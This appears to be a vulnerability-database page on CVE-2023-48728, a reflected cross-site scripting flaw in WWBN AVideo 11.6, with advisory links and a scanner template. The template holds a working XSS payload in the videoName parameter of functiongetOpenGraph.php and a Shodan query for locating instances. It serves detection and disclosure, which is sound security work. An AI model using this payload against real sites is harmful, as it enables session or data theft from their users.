| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
| CVE-2023-48728 | 10 Jan 202417:22 | – | circl | |
| WWBN AVideo Cross-Site Scripting Vulnerability | 10 Jan 202400:00 | – | cnnvd | |
| CVE-2023-48728 | 10 Jan 202415:48 | – | cve | |
| CVE-2023-48728 | 10 Jan 202415:48 | – | cvelist | |
| CVE-2023-48728 | 10 Jan 202416:15 | – | nvd | |
| Cross site scripting | 10 Jan 202416:15 | – | prion | |
| PT-2024-13632 · Wwbn · Wwbn Avideo | 10 Jan 202400:00 | – | ptsecurity | |
| CVE-2023-48728 | 23 May 202504:19 | – | redhatcve | |
| WWBN AVideo functiongetOpenGraph videoName cross-site scripting (XSS) vulnerability | 10 Jan 202400:00 | – | talos | |
| Critical vulnerability in ManageEngine could lead to file creation, dozens of other vulnerabilities disclosed by Talos to start 2024 | 17 Jan 202417:00 | – | talosblog |
| Source | Link |
|---|---|
| talosintelligence | www.talosintelligence.com/vulnerability_reports/TALOS-2023-1883 |
| nvd | www.nvd.nist.gov/vuln/detail/CVE-2023-48728 |
id: CVE-2023-48728
info:
name: WWBN AVideo 11.6 - Cross-Site Scripting
author: ritikchaddha
severity: medium
description: |
A reflected XSS vulnerability exists in the functiongetOpenGraph videoName functionality of WWBN AVideo 11.6 and dev master commit 3c6bb3ff, allowing arbitrary Javascript execution.
impact: |
Successful exploitation could lead to unauthorized access to sensitive information or account takeover.
remediation: |
Sanitize and validate user input to prevent XSS attacks.
reference:
- https://talosintelligence.com/vulnerability_reports/TALOS-2023-1883
- https://nvd.nist.gov/vuln/detail/CVE-2023-48728
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-48728
cwe-id: CWE-79
epss-score: 0.02268
epss-percentile: 0.80886
cpe: cpe:2.3:a:wwbn:avideo:3c6bb3ff:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: wwbn
product: avideo
shodan-query: html:"AVideo"
tags: cve,cve2023,avideo,xss,vkev,vuln
http:
- method: GET
path:
- "{{BaseURL}}/objects/functiongetOpenGraph.php?videoName=123+--><script>alert(document.domain)</script>"
matchers:
- type: dsl
dsl:
- 'contains_all(body, "<script>alert(document.domain)</script>", "OpenGraph no video")'
- 'status_code == 200 || status_code == 500'
- 'contains(header, "text/html")'
condition: and
# digest: 4b0a00483046022100d85082a8ffa8d5b83b06ba93ca49d8f71fe2f7ba5bd6a24081f695e2aa2504a5022100cfdc00acca0289b36040329859edf56259d0dfb1ba06be8c36cc9a7faa2d622f:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation